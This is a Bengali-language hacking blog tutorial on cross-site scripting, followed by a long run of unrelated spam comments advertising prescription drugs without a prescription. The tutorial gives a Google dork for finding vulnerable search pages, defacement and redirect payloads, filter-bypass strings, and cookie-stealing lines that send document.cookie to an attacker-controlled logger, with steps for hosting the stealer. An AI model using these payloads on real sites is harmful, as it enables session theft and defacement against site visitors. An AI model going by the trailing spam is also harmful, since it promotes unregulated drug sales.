XSS একটি সংক্ষিপ্ত শব্দ, এর পূর্ণরূপ হল Cross Site Scripting. এটি application-layer web attacks এর সবচেয়ে জনপ্রিয় একটি ম্যাথড। সাধারণত বিভিন্ন বড় বড় সাইট হ্যাকিং করতে এই ম্যাথডটি সবচেয়ে বেশি ব্যবহৃত হয়। একটি ওয়েবসাইটের নিরাপত্তা ভাঙ্গার এটিই হল সবচেয়ে ভাল পদ্ধতি।XSS attack দিয়ে একজন হ্যাকার তার ভিকটিমের ক্লায়েন্ট সাইড স্ক্রিপ্টের আসল ওয়েব পেজ সংক্রমিত করে। যখন একজন ভিজিটর আপনার ওয়েবসাইট ভিজিট করে, তখন script টি স্বয়ংক্রিয়ভাবে ভিজিটরের ব্রাউজারে ডাউনলোড হয়। কার্যত য়া অনেক প্রয়োজনীয় বিষয় আর এই গুরুত্বপূন্য বিষয় নিয়ে আমরা আলোচনা করবো।
আসসালামু আলাইকুম, সবাইকে আবারও আজকের পোষ্টে স্বাগতম। কেমন আছেন সবাই? আশা করি সবাই মহান সৃষ্টিকর্তার অশেষ রহমতে খুবই ভাল আছেন। আজ অনেক দিন পর হ্যাকিং এর একটি টিউটোরিয়াল নিয়ে হাজির হলাম। এবার হ্যাকিংয়ের যে ম্যাথড দেখাব সেটার নাম হল XSS বা Cross Site Scripting. এই টিউটোরিয়ালে আশা করি আপনাদের পুরাপুরি এই ম্যাথডের উপর শিখাতে চেষ্টা করব। টিউনারপেজ হ্যাকিং ক্লাসের ব্যবস্থা করবে বলেছিল। কিন্তু টিজে পুদিনা পাতা ভাই সময় না পাওয়ার কারণে এখনও শুরু হয় নি। তাই মাঝে মাঝে আপনাদের জন্য কিছু লিখি হ্যাকিংয়ের উপর। তাহলে চলুন মূল পোষ্টে…
কি কি শিখব এই টিউটোরিয়ালেঃ
- XSS কি?
- কিভাবে XSS Vulnerabilities খুঁজে বের করব?
- XSS প্রাথমিক আলোচনা
- ভিকটিম মারা পদ্ধতি
- Cookie চুরি করার পদ্ধতি
- Filtration Bypassing
XSS কি?
এটি নিয়ে কাজ করার আগে প্রথমেই জানতে XSS টা কি? XSS একটি সংক্ষিপ্ত শব্দ, এর পূর্ণরূপ হল Cross Site Scripting. এটি application-layer web attacks এর সবচেয়ে জনপ্রিয় একটি ম্যাথড। সাধারণত বিভিন্ন বড় বড় সাইট হ্যাকিং করতে এই ম্যাথডটি সবচেয়ে বেশি ব্যবহৃত হয়। একটি ওয়েবসাইটের নিরাপত্তা ভাঙ্গার এটিই হল সবচেয়ে ভাল পদ্ধতি।
XSS attack দিয়ে একজন হ্যাকার তার ভিকটিমের ক্লায়েন্ট সাইড স্ক্রিপ্টের আসল ওয়েব পেজ সংক্রমিত করে। যখন একজন ভিজিটর আপনার ওয়েবসাইট ভিজিট করে, তখন script টি স্বয়ংক্রিয়ভাবে ভিজিটরের ব্রাউজারে ডাউনলোড হয়। নিচের ছবিটি দেখুন…
XSS attact দিয়ে একজন হ্যাকার ওয়েবসাইটে malicous code বসাতে পারে। এখন আমরা মূল টিউটোরিয়াল শুরু করব। চলুন প্রথমে XSS Vulnerabilities খুঁজে বের করি।
XSS Vulnerabilities খুঁজে বের করা
একটি ওয়েবসাইটের vulnerabilities খুঁজে বের করার জন্য আপনি সহযোগিতা নিতে পারেন Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s ও অন্যান্য যে কোন কিছুর। এছাড়াও আপনি Google Dorks দিয়েও আপনি ওয়েবসাইটের ভ্যলু বের করে নিতে পারেন। আর যদি আপনি ক্র্যাকিং করতে না পারেন, তাহলে গুগলে যান ও নিচের ডকটি লিখে এন্টার করুন।
inurl:"search.php?q="
তাহলে আপনি অনেক গুলো ফলাফল পেয়ে যাবেন।
XSS প্রাথমিক আলোচনা
XSS এর বেসিক জিনিসগুলো জানতে প্রথমে একটি ছবি দেখতে হবে। নিচের ছবিটি দেখুন…
Xss injection এ সবচেয়ে বেশি যে কোডটি ব্যবহৃত হয়, সেটা হল
<script>alert("XSS")</script>
<script>alert("TunerPage.Com Hacked by TJ Unselected")</script>
search.php?q=
www.site.com/search.php?q=<script>alert("TunerPage.Com Hacked by TJ Unselected")</script>
<h1>anything you want</h1> <br><br><b><u>any thing you want</u></b>
www.site.com/search.php?q= <h1>TunerPage.Com Hacked by TJ Unselected</h1>
www.site.com/search.php?q=<br><br><b><u>TunerPage.Com Hacked by TJ Unselected</u></b>
ভিকটিম মারা পদ্ধতি
<html><body><IMG SRC="http://site.com/TJUnselected.png"></body></html>
<IMG SRC=""http://site.com/TJUnselected.png">
<EMBED SRC="http://site.com/TJUnselected.swf"
<script>window.open( "http://www.tunerpage.com" )</script>
Cookie চুরি করার পদ্ধতি
এটা XSS এর একটি ভাল জিনিস। প্রথমে আপনাকে একটি cookie stealer নিতে হবে। এর জন্য এখানে যান। এবার এটি কে সেভ করুন। আপনি একটি .php ফাইল খুঁজে পাবেন। এটি একটি ওয়েব সার্ভারে আপলোড করুন। এবং মনে রাখবেন অবশ্যই ‘log.txt’ নামে একটি ফাইল তৈরি করবেন ও একে 777 এ chmod করুন। chmod সম্পর্কে আপনাদের আরেকটি পোষ্টে ভাল করে বুঝিয়ে দিব। যাক এটা না করেই কাজটা করে ফেলুন। তবে বলেই রাখি chmod হল একটি Unix command যা আপনাকে একটি সিস্টেমের প্রবেশাধিকার সম্পর্কে জানাবে। এবার একটি XSS vulnerable website খুঁজে বের করুন। পাওয়া গেলে আপনি এখন আপনার কোডটি প্রবেশ করাবেন।
window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
অথবা
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
এবার যখনই ভিজিটর রা আপনার সাইটটি ভিজিট করবে তখনই এটি তাদের কুকিগুলো চুরি করে রেখে দিবে। এখন আমরা কুকি নিয়ে নিব।
http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie
Filteration Bypassing
আপনি এমন অনেকগুলো সাইট পাবেন যেগুলো vulnerable কিন্তু সেখানে কোড কাজ করে না। তখন কি করবেন? এই জন্যই এই অংশটি। bypass filteration এর কয়েকটি ম্যাথড দেখুন
')alert('xss');
অথবা
");alert('xss');
উপরে যেকোন একটা কোড দিয়ে আপনি vulnerable server থেকে যে কোন কিছু পেতে পারেন। তবে আপনি আপনার ডাটা সাবমিট করা আগে hexing or base64 encoding করে নিতে পারেন। bypass filteration এর আরও অন্যান্য কয়েকটি পথ।
<script type=text/javascript>alert("saurav")</script> <script>alert("saurav")</script>; <script>alert("saurav");</script> <script>alert("/saurav"/)</script>
Happy Hacking
আশা করি হ্যাকিংয়ের অপব্যবহার করবেন না। এটি জেনে রাখুন যাতে হ্যাকিংয়ের শিকার না হন।
সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকবেন, আল্লাহ হাফেজ।
order atorvastatin 20mg online cheap oral atorvastatin 20mg lipitor 20mg sale
atorvastatin 20mg cheap order lipitor 80mg pills buy lipitor without prescription
cipro 1000mg drug – bactrim tablet augmentin 1000mg us
cipro 1000mg us – cipro 500mg pill buy generic augmentin online
where can i buy cipro – keflex cheap amoxiclav sale
metformin 500mg pill – cefadroxil 500mg sale order lincomycin pill
order zidovudine generic – brand roxithromycin 150mg buy generic allopurinol
order clozaril 100mg pill – buy clozaril tablets buy famotidine paypal
buy clozapine 100mg without prescription – aceon 8mg cost famotidine price
seroquel pills – bupropion oral buy generic eskalith over the counter
seroquel 100mg cost – ziprasidone buy online buy eskalith paypal
anafranil price – buy cheap cymbalta buy doxepin 25mg sale
where to buy anafranil without a prescription – sinequan 25mg generic sinequan 75mg cost
hydroxyzine sale – buy escitalopram 10mg how to buy amitriptyline
hydroxyzine 10mg over the counter – atarax 25mg without prescription order amitriptyline sale
order augmentin 1000mg sale – zyvox 600mg drug buy cipro generic
cheap amoxicillin sale – buy generic ceftin 250mg order generic ciprofloxacin 500mg
buy augmentin 625mg pills – baycip uk ciprofloxacin 500mg canada
amoxil online buy – amoxicillin online buy cipro buy online
buy cleocin pill – order cleocin generic buy chloramphenicol without prescription
cheap azithromycin 500mg – order generic tinidazole purchase ciprofloxacin sale
buy clindamycin pills – buy acticlate purchase chloromycetin generic
zithromax 500mg generic – buy ofloxacin 400mg pill ciplox over the counter